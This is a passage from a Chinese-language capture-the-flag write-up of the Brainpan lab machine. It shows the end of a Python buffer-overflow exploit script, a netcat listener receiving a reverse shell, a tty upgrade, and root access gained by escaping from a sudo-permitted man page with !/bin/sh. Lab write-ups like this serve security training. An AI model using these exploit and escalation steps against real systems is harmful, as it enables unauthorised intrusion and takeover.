socket.SOCK_STREAM)try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!")except: print("Could not connect.")开启监听,执行,收到反弹shell
└─# nc -lnvp 4444listening on [any] 4444 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.80.112] 47943iduid=1002(puck) gid=1002(puck) groups=1002(puck)whoamipuck用python3 -c "__import__('pty').spawn('/bin/bash')"切换成tty,查看sudo特权
python3 -c "__import__('pty').spawn('/bin/bash')"puck@brainpan:/home/puck$ sudo -lsudo -lMatching Defaults entries for puck on this host: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser puck may run the following commands on this host: (root) NOPASSWD: /home/anansi/bin/anansi_utilanansi_util看起来像是一个自定义命令,尝试执行:
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_utilsudo /home/anansi/bin/anansi_utilUsage: /home/anansi/bin/anansi_util [action]Where [action] is one of: - network - proclist - manual [command]弹出了一个manu名单,前面应该是接相应的命令
通过测试network相当于ifconfig命令,manual相当于man命令,proclist不晓得是什么
咱们能够依据manual命令进行权限晋升
首先执行:sudo /home/anansi/bin/anansi_util manual man
其次执行:!/bin/sh
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual mansudo /home/anansi/bin/anansi_util manual manNo manual entry for manualWARNING: terminal is not fully functional- (press RETURN)!/bin/sh!/bin/sh# ididuid=0(root) gid=0(root) groups=0(root)# whoamiwhoamiroot# 胜利提权到root。